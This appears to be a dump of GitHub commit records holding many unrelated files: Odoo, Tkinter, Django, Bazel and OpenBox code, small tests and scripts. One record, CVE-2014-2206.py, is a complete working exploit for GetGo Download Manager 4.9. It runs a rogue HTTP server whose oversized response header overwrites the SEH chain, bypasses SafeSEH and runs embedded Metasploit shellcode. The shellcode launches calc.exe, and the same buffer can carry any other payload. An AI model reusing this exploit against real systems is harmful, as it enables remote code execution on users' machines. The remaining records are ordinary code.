atmcb/odoo,poljeff/odoo,cdrooom/odoo,alexteodor/odoo,CopeX/odoo,KontorConsulting/odoo,MarcosCommunity/odoo,datenbetrieb/odoo,klunwebale/odoo,sysadminmatmoz/OCB,ojengwa/odoo,juanalfonsopr/odoo,guewen/OpenUpgrade,sysadminmatmoz/OCB,optima-ict/odoo,gorjuce/odoo,jiangzhixiao/odoo,addition-it-solutions/project-all,savoirfairelinux/odoo,ThinkOpen-Solutions/odoo,abstract-open-solutions/OCB,damdam-s/OpenUpgrade,nexiles/odoo,janocat/odoo,lightcn/odoo,Drooids/odoo,papouso/odoo,bobisme/odoo,makinacorpus/odoo,nagyistoce/odoo-dev-odoo,odootr/odoo,brijeshkesariya/odoo,ojengwa/odoo,ujjwalwahi/odoo,glovebx/odoo,shingonoide/odoo,syci/OCB,mszewczy/odoo,provaleks/o8,colinnewell/odoo,collex100/odoo,nhomar/odoo,ChanduERP/odoo,GauravSahu/odoo,savoirfairelinux/odoo,0k/odoo,massot/odoo,fgesora/odoo,xzYue/odoo,ujjwalwahi/odoo,mmbtba/odoo,AuyaJackie/odoo,Eric-Zhong/odoo,nexiles/odoo,tvtsoft/odoo8,cloud9UG/odoo,frouty/odoogoeen,srsman/odoo,abenzbiria/clients_odoo,xujb/odoo,bakhtout/odoo-educ,naousse/odoo,laslabs/odoo,slevenhagen/odoo,SAM-IT-SA/odoo,BT-rmartin/odoo,ovnicraft/odoo,OpenPymeMx/OCB,makinacorpus/odoo,odoo-turkiye/odoo,arthru/OpenUpgrade,Bachaco-ve/odoo,feroda/odoo,VielSoft/odoo,hifly/OpenUpgrade,simongoffin/website_version,leoliujie/odoo,mkieszek/odoo,avoinsystems/odoo,deKupini/erp,ygol/odoo,sergio-incaser/odoo,simongoffin/website_version,patmcb/odoo,GauravSahu/odoo,highco-groupe/odoo,luistorresm/odoo,mlaitinen/odoo,pedrobaeza/OpenUpgrade,shaufi10/odoo,shingonoide/odoo | addons/account_analytic_analysis/cron_account_analytic_account.py | addons/account_analytic_analysis/cron_account_analytic_account.py | #!/usr/bin/env python
from osv import osv
from mako.template import Template
import time
try:
import cStringIO as StringIO
except ImportError:
import StringIO
import tools
MAKO_TEMPLATE = u"""Hello ${user.name},
Here is a list of contracts that have to be renewed for two
possible reasons:
- the end of contract date has passed
- the customer consumed more hours than expected
Please contact the customer to renew the contract or sell a new one.
The contract has been set to the pending state; please update the status
of the analytic account according to these rules:
- Set Done: if the customer does not want to renew
- Set Open: if the customer purchased an extra contract
Here is the list of contracts to renew:
% for partner, accounts in partners.iteritems():
* ${partner.name}
% for account in accounts:
- Name: ${account.name}
% if account.quantity_max != 0.0:
- Quantity: ${account.quantity}/${account.quantity_max} hours
% endif
- Dates: ${account.date_start} to ${account.date and account.date or '???'}
- Contacts:
${account.partner_id.name}, ${account.partner_id.phone}, ${account.partner_id.email}
% endfor
% endfor
You can use the report in the menu: Sales > Invoicing > Overdue Accounts
Regards,
--
OpenERP
"""
class analytic_account(osv.osv):
_inherit = 'account.analytic.account'
def cron_account_analytic_account(self, cr, uid, context=None):
domain = [
('name', 'not ilike', 'maintenance'),
('partner_id', '!=', False),
('user_id', '!=', False),
('user_id.user_email', '!=', False),
('state', 'in', ('draft', 'open')),
'|', ('date', '<', time.strftime('%Y-%m-%d')), ('date', '=', False),
]
account_ids = self.search(cr, uid, domain, context=context, order='name asc')
accounts = self.browse(cr, uid, account_ids, context=context)
users = dict()
for account in accounts:
users.setdefault(account.user_id, dict()).setdefault(account.partner_id, []).append(account)
account.write({'state' : 'pending'}, context=context)
for user, data in users.iteritems():
subject = '[OPENERP] Reporting: Analytic Accounts'
body = Template(MAKO_TEMPLATE).render_unicode(user=user, partners=data)
tools.email_send('[email protected]', [user.user_email, ], subject, body)
return True
analytic_account()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| #!/usr/bin/env python
from osv import osv
from mako.template import Template
import time
try:
import cStringIO as StringIO
except ImportError:
import StringIO
import tools
MAKO_TEMPLATE = u"""Hello ${user.name},
Here is a list of contracts that have to be renewed for two
possible reasons:
- the end of contract date has passed
- the customer consumed more hours than expected
Please contact the customer to renew the contract or sell a new one.
The contract has been set to the pending state; please update the status
of the analytic account according to these rules:
- Set Done: if the customer does not want to renew
- Set Open: if the customer purchased an extra contract
Here is the list of contracts to renew:
% for partner, accounts in partners.iteritems():
* ${partner.name}
% for account in accounts:
- Name: ${account.name}
% if account.quantity_max != 0.0:
- Quantity: ${account.quantity}/${account.quantity_max} hours
% endif
- Dates: ${account.date_start} to ${account.date and account.date or '???'}
- Contacts:
. ${account.partner_id.name}, ${account.partner_id.phone}, ${account.partner_id.email}
% endfor
% endfor
You can use the report in the menu: Sales > Invoicing > Overdue Accounts
Regards,
--
OpenERP
"""
class analytic_account(osv.osv):
_inherit = 'account.analytic.account'
def cron_account_analytic_account(self, cr, uid, context=None):
domain = [
('name', 'not ilike', 'maintenance'),
('partner_id', '!=', False),
('user_id', '!=', False),
('user_id.user_email', '!=', False),
('state', 'in', ('draft', 'open')),
'|', ('date', '<', time.strftime('%Y-%m-%d')), ('date', '=', False),
]
account_ids = self.search(cr, uid, domain, context=context, order='name asc')
accounts = self.browse(cr, uid, account_ids, context=context)
users = dict()
for account in accounts:
users.setdefault(account.user_id, dict()).setdefault(account.partner_id, []).append(account)
account.write({'state' : 'pending'}, context=context)
for user, data in users.iteritems():
subject = '[OPENERP] Reporting: Analytic Accounts'
body = Template(MAKO_TEMPLATE).render_unicode(user=user, partners=data)
tools.email_send('[email protected]', [user.user_email, ], subject, body)
return True
analytic_account()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | Python |
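A minimal smoke test for the renewal template above — the user, partner and account objects here are hypothetical namedtuple stand-ins (Python 2, mako installed, MAKO_TEMPLATE from the module above in scope), not part of the original commit:

from collections import namedtuple
from mako.template import Template
User = namedtuple('User', 'name')
Partner = namedtuple('Partner', 'name phone email')
Account = namedtuple('Account', 'name quantity quantity_max date_start date partner_id')
partner = Partner('Acme Ltd', '555-0100', '[email protected]')
account = Account('Support 2011', 12.0, 40.0, '2011-01-01', False, partner)
# partners maps each partner to its accounts, mirroring the users.setdefault(...) grouping above
body = Template(MAKO_TEMPLATE).render_unicode(user=User('Alice'), partners={partner: [account]})
print body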
2aa7a6260d9d5a74ee81677be2bd5f97774f9116 | Add tests for internal gregorian functions. | jwg4/calexicon,jwg4/qual | calexicon/internal/tests/test_gregorian.py | calexicon/internal/tests/test_gregorian.py | import unittest
from calexicon.internal.gregorian import is_gregorian_leap_year
class TestGregorian(unittest.TestCase):
def test_is_gregorian_leap_year(self):
self.assertTrue(is_gregorian_leap_year(2000))
self.assertTrue(is_gregorian_leap_year(1984))
self.assertFalse(is_gregorian_leap_year(1900))
self.assertFalse(is_gregorian_leap_year(1901))
| apache-2.0 | Python |
|
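The function under test is defined elsewhere in the package; a minimal implementation consistent with the four assertions above (an illustrative sketch, not necessarily the project's actual code) is:

def is_gregorian_leap_year(year):
    # Leap every 4th year, except century years that are not divisible by 400.
    return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)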
387d05dbdb81bacc4851adffbfd7f827e709d4cc | Add Step class - Create Step.py to hold code for the Step class. - The Step class represents a single step/instruction for a Recipe object. | VictorLoren/pyRecipeBook | Step.py | Step.py | # Step object
class Step:
    # Initialize the object with its instruction text
def __init__(self,description):
self.description = description
| mit | Python |
|
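A quick usage sketch (the instruction text is invented):

step = Step("Preheat the oven to 180 C.")
print(step.description)  # -> Preheat the oven to 180 C.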
7d8a566ac51e7e471603c2160dce2046eb698738 | add sn domains conversion tool | exzhawk/ipv6-hosts,danny200309/ipv6-hosts,Phecda/ipv6-hosts,tel5169553/ipv6-hosts,offbye/ipv6-hosts,greatlse/ipv6-hosts,zhenghj7/ipv6-hosts,afdnlw/ipv6-hosts,tjshi/ipv6-hosts,Lan-minqi/ipv6-hosts,AlexDialga/ipv6-hosts,zhenghj7/ipv6-hosts,lennylxx/ipv6-hosts,AlexDialga/ipv6-hosts,JYzor/ipv6-hosts,Badredapple/ipv6-hosts,greatlse/ipv6-hosts,exzhawk/ipv6-hosts,Lan-minqi/ipv6-hosts,tjshi/ipv6-hosts,Badredapple/ipv6-hosts,lennylxx/ipv6-hosts,bygloam/ipv6-hosts,bygloam/ipv6-hosts,afdnlw/ipv6-hosts,gaojunchen/ipv6-hosts,offbye/ipv6-hosts,JYzor/ipv6-hosts,gaojunchen/ipv6-hosts,Phecda/ipv6-hosts,tel5169553/ipv6-hosts,kang000feng/ipv6-hosts,danny200309/ipv6-hosts,kang000feng/ipv6-hosts | conv.py | conv.py | #!/usr/bin/env python
# Read the wiki for more infomation
# https://github.com/lennylxx/ipv6-hosts/wiki/sn-domains
import sys
table = '1023456789abcdefghijklmnopqrstuvwxyz'
def iata2sn(iata):
global table
sn = ''
for v in iata[0:3]:
i = ((ord(v) - ord('a')) * 7 + 5) % 36
sn += table[i]
return sn
def sn2iata(sn):
global table
iata = ''
for v in sn:
i = table.index(v)
i = (5 - i % 7) * 5 + i / 7 + 10
iata += table[i]
return iata
def num2code(num):
global table
code = ''
for v in num:
i = ((ord(v) - ord('0') + 1) * 7) % 36
code += table[i]
return code
def code2num(code):
global table
num = ''
for v in code:
i = table.index(v)
i = i / 7 + i % 7 - 1
num += str(i)
return num
def main():
if len(sys.argv) != 3:
print 'usage:\n\t./%s -i iata\n\t./%s -s sn'\
% (sys.argv[0], sys.argv[0])
sys.exit(1)
input = sys.argv[2]
ret = ''
if sys.argv[1] == '-i':
ret += iata2sn(input[0:3])
ret += num2code(input[3:5])
ret += 'n'
ret += num2code(input[6:8])
print ret
elif sys.argv[1] == '-s':
ret += sn2iata(input[0:3])
ret += code2num(input[3:5])
ret += 's'
ret += code2num(input[6:8])
print ret
else:
print 'Unknown option.'
sys.exit(1)
if __name__ == '__main__':
main()
| mit | Python |
|
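Since each decoder inverts its encoder over lowercase IATA letters and decimal digits, a quick round-trip check (Python 2, with the functions above in scope; the sample strings are arbitrary) is:

for iata in ['lax', 'sea', 'ord']:
    assert sn2iata(iata2sn(iata)) == iata
for num in ['09', '42', '77']:
    assert code2num(num2code(num)) == num
print 'round-trip OK'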
d2bdbd0d851fda046c0be55105a211a382c22766 | Add Day 2 | icydoge/AdventOfCodeSolutions | day2.py | day2.py | #Advent of Code December 2
#Written by icydoge - icydoge AT gmail dot com
with open('paper.txt') as f:
content = f.read().splitlines()[:-1] #Remove last empty line
part_one_answer = 0
part_two_answer = 0
for box in content:
dimensions = sorted(map(int,box.split('x')))
slack = dimensions[0] * dimensions[1]
wrapping = 2 * (dimensions[0] * dimensions[1] + dimensions[1] * dimensions[2] + dimensions[0] * dimensions[2])
ribbon = (dimensions[0] + dimensions[1]) * 2
bow = dimensions[0] * dimensions[1] * dimensions[2]
part_one_answer += wrapping + slack
part_two_answer += ribbon + bow
print "Total square feet of wrapping paper (Part One):", part_one_answer
print "Total feet of ribbon (Part Two):", part_two_answer | mit | Python |
|
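A worked check against the puzzle's classic 2x3x4 example box (58 square feet of paper, 34 feet of ribbon):

dims = sorted([2, 3, 4])
paper = 2 * (dims[0]*dims[1] + dims[1]*dims[2] + dims[0]*dims[2]) + dims[0]*dims[1]
ribbon = (dims[0] + dims[1]) * 2 + dims[0]*dims[1]*dims[2]
assert (paper, ribbon) == (58, 34)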
acf4ad1e5948354281fec040badfe412f5194529 | add wsgi | jmcomber/FlaskDB,jmcomber/FlaskDB,jmcomber/FlaskDB | flaskr/flaskr.wsgi | flaskr/flaskr.wsgi | <VirtualHost *>
ServerName example.com
WSGIDaemonProcess flaskr user=user1 group=group1 threads=5
WSGIScriptAlias / /var/www/FlaskDB/flaskr/flaskr.wsgi
<Directory /var/www/FlaskDB/flaskr>
WSGIProcessGroup flaskr
WSGIApplicationGroup %{GLOBAL}
Order deny,allow
Allow from all
</Directory>
</VirtualHost> | mit | Python |
|
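Note that despite the .wsgi filename, the committed content is the Apache virtual-host block rather than the WSGI entry point it aliases. The flaskr.wsgi script referenced by WSGIScriptAlias would typically contain something like this (a hypothetical sketch, assuming the Flask app object lives in flaskr.py):

import sys
sys.path.insert(0, '/var/www/FlaskDB/flaskr')
from flaskr import app as application  # mod_wsgi looks for the name 'application'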
b6fbdd70a0486718d711a7efc310e350a1837b9c | add collapse reads code | lpantano/seqcluster,lpantano/seqcluster,lpantano/seqcluster,lpantano/seqcluster,lpantano/seqcluster | seqcluster/collapse.py | seqcluster/collapse.py | import os
from libs.fastq import collapse, splitext_plus
import logging
logger = logging.getLogger('seqbuster')
def collapse_fastq(args):
"""collapse fasq files after adapter trimming
"""
idx = 0
try:
seqs = collapse(args.fastq)
out_file = splitext_plus(os.path.basename(args.fastq))[0] + "_trimmed.fastq"
except IOError as e:
logger.error("I/O error({0}): {1}".format(e.errno, e.strerror))
raise "Can not read file"
logger.info("writing output")
with open(os.path.join(args.out, out_file), 'w') as handle:
for seq in seqs:
idx += 1
qual = "".join(seqs[seq].get())
counts = seqs[seq].times
handle.write(("@seq_{idx}_x{counts}\n{seq}\n+\n{qual}\n").format(**locals()))
| mit | Python |
|
871ec5597059934bce64f7d31fa7e5ab165063ee | Add basic GUI frontend | claudemuller/memorise-py | memorise-frontend.py | memorise-frontend.py | #!/usr/bin/env python
# -*- Coding: utf-8 -*-
from tkinter import Tk, Menu
from ttk import Frame, Button, Style
class MemoriseFrontend(Frame):
version = "0.1-py"
padding = 10
def __init__(self, parent):
Frame.__init__(self, parent)
self.parent = parent
self.style = Style()
self.style.theme_use("default")
self._initUI()
def _initUI(self):
self.parent.title("Memorise v" + self.version)
self.columnconfigure(0, pad=self.padding)
self.columnconfigure(1, pad=self.padding)
self.columnconfigure(2, pad=self.padding)
self.columnconfigure(3, pad=self.padding)
self.columnconfigure(4, pad=self.padding)
self.rowconfigure(0, pad=self.padding)
self.rowconfigure(1, pad=self.padding)
self.rowconfigure(2, pad=self.padding)
self.rowconfigure(3, pad=self.padding)
self.rowconfigure(4, pad=self.padding)
# Row 1
btnUp = Button(self, text="Up", command=self._onUpBtn)
btnUp.grid(row=1, column=2)
# Row 2
btnLeft = Button(self, text="Left", command=self._onLeftBtn)
btnLeft.grid(row=2, column=1)
# Row 2
btnRight = Button(self, text="Right", command=self._onRightBtn)
btnRight.grid(row=2, column=3)
# Row 3
btnDown = Button(self, text="Down", command=self._onDownBtn)
btnDown.grid(row=3, column=2)
self.pack()
def _onUpBtn(self):
pass
def _onLeftBtn(self):
pass
def _onRightBtn(self):
pass
def _onDownBtn(self):
pass
def main():
root = Tk()
app = MemoriseFrontend(root)
root.mainloop()
main()
| mit | Python |
|
db81e8ca0b0321994f188daf45211e6ae2dda4a4 | Make a control dataset that only contains sequences with titer data. | nextstrain/augur,blab/nextstrain-augur,nextstrain/augur,nextstrain/augur | dengue/utils/make_titer_strain_control.py | dengue/utils/make_titer_strain_control.py | from Bio import SeqIO
from pprint import pprint
with open('../../data/dengue_titers.tsv', 'r') as f:
titerstrains = set([ line.split()[0] for line in f ])
with open('../../data/dengue_titers.tsv', 'r') as f:
serastrains = set([ line.split()[1] for line in f ])
autologous = titerstrains.intersection(serastrains)
print len(autologous)
strains_with_titers = [s for s in SeqIO.parse(open('../../data/dengue.fasta', 'r'), 'fasta') if s.description.split('|')[0] in autologous ]
SeqIO.write(strains_with_titers, '../../data/control.fasta', 'fasta')
print 'Found %d strains with autologous titers and sequence data.'%len(strains_with_titers)
| agpl-3.0 | Python |
|
d1024a2892c6e171b3d465d56c8a1fad25d7fbdc | Create ESLint styler | stopthatcow/zazu,stopthatcow/zazu | zazu/plugins/eslint_styler.py | zazu/plugins/eslint_styler.py | # -*- coding: utf-8 -*-
"""eslint plugin for zazu."""
import zazu.styler
zazu.util.lazy_import(locals(), [
'subprocess',
'os',
'tempfile'
])
__author__ = "Patrick Moore"
__copyright__ = "Copyright 2018"
class eslintStyler(zazu.styler.Styler):
"""ESLint plugin for code styling."""
def style_string(self, string):
"""Fix a string to be within style guidelines."""
temp = tempfile.NamedTemporaryFile(delete=False, suffix=".js")
temp_path = temp.name
args = ['eslint', '--fix'] + self.options + [temp_path]
temp.write(string)
temp.close()
try:
subprocess.check_output(args)
except subprocess.CalledProcessError:
pass
with open(temp_path, "r") as f:
ret = f.read()
os.remove(temp_path)
return ret
@staticmethod
def default_extensions():
"""Return the list of file extensions that are compatible with this Styler."""
return ['*.js']
@staticmethod
def type():
"""Return the string type of this Styler."""
return 'eslint'
| mit | Python |
|
6d53fcd788ef985c044657a6bf2e6faa5b8b9673 | Create CVE-2014-2206.py | rcesecurity/exploits,rcesecurity/exploits,rcesecurity/exploits | CVE-2014-2206/CVE-2014-2206.py | CVE-2014-2206/CVE-2014-2206.py | #!/usr/bin/python
# Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution
# Version: v4.9.0.1982
# CVE: CVE-2014-2206
# Date: 2014-03-09
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.rcesecurity.com
# Software Link: http://www.getgosoft.com
# Tested on: WinXP SP3-GER
#
# Howto / Notes:
# SEH overwrite was taken from outside of loaded modules, because all modules are SafeSEH-enabled
#
from socket import *
from time import sleep
from struct import pack
host = "192.168.0.1"
port = 80
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
junk0 = "\x90" * 4107
nseh = "\x90\x90\xEB\x06"
seh=pack('<L',0x00280b0b) # call dword ptr ss:[ebp+30] [SafeSEH Bypass]
nops = "\x90" * 50
# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d'
shellcode = ("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
"\xa5\x59\x50")
payload = junk0 + nseh + seh + nops + shellcode
buffer = "HTTP/1.1 200 "+payload+"\r\n"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"
sleep(3)
cl.close()
s.close()
| mit | Python |
|
690b5a994bc20b561632d9aa3e332061457a3d72 | Add missing __init__.py to overkiz tests (#62727) | rohitranjan1991/home-assistant,w1ll1am23/home-assistant,toddeye/home-assistant,home-assistant/home-assistant,toddeye/home-assistant,nkgilley/home-assistant,w1ll1am23/home-assistant,GenericStudent/home-assistant,GenericStudent/home-assistant,nkgilley/home-assistant,mezz64/home-assistant,mezz64/home-assistant,rohitranjan1991/home-assistant,home-assistant/home-assistant,rohitranjan1991/home-assistant | tests/components/overkiz/__init__.py | tests/components/overkiz/__init__.py | """Tests for the overkiz component."""
| apache-2.0 | Python |
|
318b775a150f03e3311cb1a2b93cf21999fac70d | Create base class for openbox messages and create most of the Messages objects | DeepnessLab/obsi,pavel-lazar/obsi,OpenBoxProject/obsi,DeepnessLab/obsi,pavel-lazar/obsi,pavel-lazar/obsi,pavel-lazar/obsi,OpenBoxProject/obsi,OpenBoxProject/obsi,OpenBoxProject/obsi,DeepnessLab/obsi,DeepnessLab/obsi | openbox/messages.py | openbox/messages.py | """
Messages between OBC and OBI
"""
import json
class MessageParsingError(Exception):
pass
class MessageMeta(type):
def __init__(cls, name, bases, dct):
if not hasattr(cls, "messages_registry"):
# this is the base class. Create an empty registry
cls.messages_registry = {}
else:
# this is the derived class. Add cls to the registry
cls.messages_registry[name] = cls
super(MessageMeta, cls).__init__(name, bases, dct)
class Message(object):
"""
The base class for all messages.
    Messages shouldn't derive from this class directly but from one of its subclasses.
"""
__metaclass__ = MessageMeta
# a list of the fields in the message, no need to put the 'type' field
__slots__ = ['xid']
# Global XID counter
XID = 0
def __init__(self, **kwargs):
if 'xid' not in kwargs:
kwargs['xid'] = Message.XID
Message.XID += 1
for field in self.__slots__:
try:
setattr(self, field, kwargs[field])
except KeyError:
raise TypeError("Field %s, not given" % field)
@classmethod
def from_json(cls, raw_data):
obj = json.loads(raw_data)
try:
msg_type = obj.pop('type')
clazz = cls.messages_registry[msg_type]
except KeyError:
raise MessageParsingError("Unknown Message Type" % raw_data)
try:
return clazz(**obj)
except TypeError as e:
raise MessageParsingError(e.message)
def to_dict(self):
return dict((field, getattr(self, field)) for field in self.__slots__)
def to_json(self):
obj_dict = self.to_dict()
obj_dict['type'] = self.__class__.__name__
return json.dumps(obj_dict)
def __str__(self):
return self.to_json()
class MessageRequest(Message):
"""
A request message.
"""
pass
class MessageResponse(Message):
"""
A response message
"""
# The fields to copy from the request
__copy_request_fields__ = ['xid']
@classmethod
def from_request(cls, request, **kwargs):
for field in cls.__copy_request_fields__:
kwargs[field] = getattr(request, field)
return cls(**kwargs)
class Hello(MessageRequest):
__slots__ = ['xid', 'dpid', 'version', 'capabilities']
class KeepAlive(MessageRequest):
__slots__ = ['xid', 'dpid']
class ListCapabilitiesRequest(MessageRequest):
__slots__ = ['xid', ]
class ListCapabilitiesResponse(MessageResponse):
__slots__ = ['xid', 'capabilities']
class GlobalStatsRequest(MessageRequest):
__slots__ = ['xid']
class GlobalStatsResponse(MessageResponse):
__slots__ = ['xid', 'stats']
class GlobalStatsReset(MessageRequest):
__slots__ = ['xid']
class ReadRequest(MessageRequest):
__slots__ = ['xid', 'block_id', 'read_handle']
class ReadResponse(MessageResponse):
__slots__ = ['xid', 'block_id', 'read_handle', 'result']
__copy_request_fields__ = ['xid', 'block_id', 'read_handle']
class WriteRequest(MessageRequest):
__slots__ = ['xid', 'block_id', 'write_handle', 'value']
class WriteResponse(MessageResponse):
__slots__ = ['xid', 'block_id', 'write_handle']
__copy_request_fields__ = ['xid', 'block_id', 'write_handle']
class SetProcessingGraph(MessageRequest):
__slots__ = ['xid', 'required_modules', 'block', 'connectors']
class SetLogServer(MessageRequest):
__slots__ = ['xid', 'address', 'port']
class BarrierRequest(MessageRequest):
__slots__ = ['xid']
class Error(MessageResponse):
__slots__ = ['xid', 'error_type', 'error_subtype', 'message', 'extended_message']
class SetStorageServer(MessageRequest):
__slots__ = ['xid', 'address', 'port']
class AddCustomModule(MessageRequest):
__slots__ = ['xid', 'module_name', 'module_content', 'content_type', 'content_transfer_encoding', 'translation']
class RemoveCustomModule(MessageRequest):
__slots__ = ['xid', 'module_name'] | apache-2.0 | Python |
|
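A round-trip sketch of the registry above (field values are made up; only classes and slots defined in this commit are used):

req = ReadRequest(block_id='block-1', read_handle='byte_count')
raw = req.to_json()                       # serialized with "type": "ReadRequest"
parsed = Message.from_json(raw)           # dispatched through messages_registry
assert isinstance(parsed, ReadRequest) and parsed.xid == req.xid
resp = ReadResponse.from_request(req, result=1024)
assert resp.read_handle == 'byte_count'   # copied via __copy_request_fields__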
d08426ffde22c2ded72425f1d1c54923b9aa0b97 | Update TFRT dependency to use revision http://github.com/tensorflow/runtime/commit/4b193958ac9b893b33dc03cc6882c70ad4ad509d. | karllessard/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,Intel-tensorflow/tensorflow,Intel-tensorflow/tensorflow,karllessard/tensorflow,karllessard/tensorflow,tensorflow/tensorflow,paolodedios/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,paolodedios/tensorflow,yongtang/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_saved_model,yongtang/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,karllessard/tensorflow,Intel-tensorflow/tensorflow,paolodedios/tensorflow,yongtang/tensorflow,Intel-tensorflow/tensorflow,Intel-tensorflow/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_saved_model,paolodedios/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,karllessard/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow,paolodedios/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,yongtang/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-pywrap_saved_model,Intel-tensorflow/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,Intel-tensorflow/tensorflow,tensorflow/tensorflow,yongtang/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,paolodedios/tensorflow,yongtang/tensorflow,yongtang/tensorflow,karllessard/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,paolodedios/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-pywrap_tf_optimizer,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,paolodedios/tensorflow | third_party/tf_runtime/workspace.bzl | third_party/tf_runtime/workspace.bzl | """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive", "tf_mirror_urls")
def repo():
"""Imports TFRT."""
# Attention: tools parse and update these lines.
TFRT_COMMIT = "4b193958ac9b893b33dc03cc6882c70ad4ad509d"
TFRT_SHA256 = "5b011d3f3b25e6c9646da078d0dbd8000ca063fa4fe6ef53449692c363fa13f7"
tf_http_archive(
name = "tf_runtime",
sha256 = TFRT_SHA256,
strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
urls = tf_mirror_urls("https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT)),
# A patch file can be provided for atomic commits to both TF and TFRT.
# The job that bumps the TFRT_COMMIT also resets patch_file to 'None'.
patch_file = None,
)
| """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive", "tf_mirror_urls")
def repo():
"""Imports TFRT."""
# Attention: tools parse and update these lines.
TFRT_COMMIT = "f5ea7e9c419b881d7f3136de7a7388a23feee70e"
TFRT_SHA256 = "723c9b1fabc504fed5b391fc766e2504559c2b02b4f4e01c55bc77b8ff0df8ed"
tf_http_archive(
name = "tf_runtime",
sha256 = TFRT_SHA256,
strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
urls = tf_mirror_urls("https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT)),
# A patch file can be provided for atomic commits to both TF and TFRT.
# The job that bumps the TFRT_COMMIT also resets patch_file to 'None'.
patch_file = None,
)
| apache-2.0 | Python |
79a38e9ef0ac04c4efef55c26f74ad2b11442a7b | add a command to fix the missing packages | dstufft/jutils | crate_project/apps/crate/management/commands/fix_missing_files.py | crate_project/apps/crate/management/commands/fix_missing_files.py | from django.core.management.base import BaseCommand
from packages.models import ReleaseFile
from pypi.processor import PyPIPackage
class Command(BaseCommand):
def handle(self, *args, **options):
i = 0
for rf in ReleaseFile.objects.filter(digest="").distinct("release__package"):
p = PyPIPackage(rf.release.package)
p.process()
i += 1
print rf.release.package.name, rf.release.version
print "Fixed %d packages" % i
| bsd-2-clause | Python |
|
